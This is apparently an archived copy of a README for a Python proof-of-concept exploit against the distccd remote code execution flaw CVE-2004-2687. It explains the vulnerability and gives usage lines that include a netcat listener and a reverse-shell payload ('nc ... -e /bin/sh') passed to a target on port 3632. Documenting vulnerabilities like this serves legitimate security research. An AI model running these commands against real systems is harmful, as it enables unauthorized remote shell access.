关联漏洞
介绍
# distccd_rce_CVE-2004-2687
🖥️ -n3rdyn3xus-
#️⃣ CVE-2004-2687
#️⃣ Upgrade to Python3
Overview
This repository contains a Proof of Concept (PoC) exploit for the distccd vulnerability identified as `CVE-2004-2687`. The vulnerability exists in the `distccd` daemon, which is part of the distcc distributed C/C++ compilation system. When improperly configured, `distccd` allows remote attackers to execute arbitrary commands on the server without any authentication.
Vulnerability Details
distcc is designed to distribute compilation tasks across multiple machines to speed up the build process. However, if the distccd daemon is not properly secured, it exposes a remote code execution (RCE) vulnerability. This occurs because the daemon listens on a network port and accepts commands from any client, allowing them to execute shell commands on the server as the user running the daemon.
The vulnerability has been assigned `CVE-2004-2687` and affects `distccd` versions prior to 3.1. When exploited, an attacker can gain shell access to the vulnerable machine, leading to potential compromise of the entire system.
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
Vulnerability :

Exploit :

文件快照
[4.0K] /data/pocs/cbadfd3c2bea481895c2a5968676cea52f2a9e7b
├── [2.7K] distccd_rce.py
└── [1.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。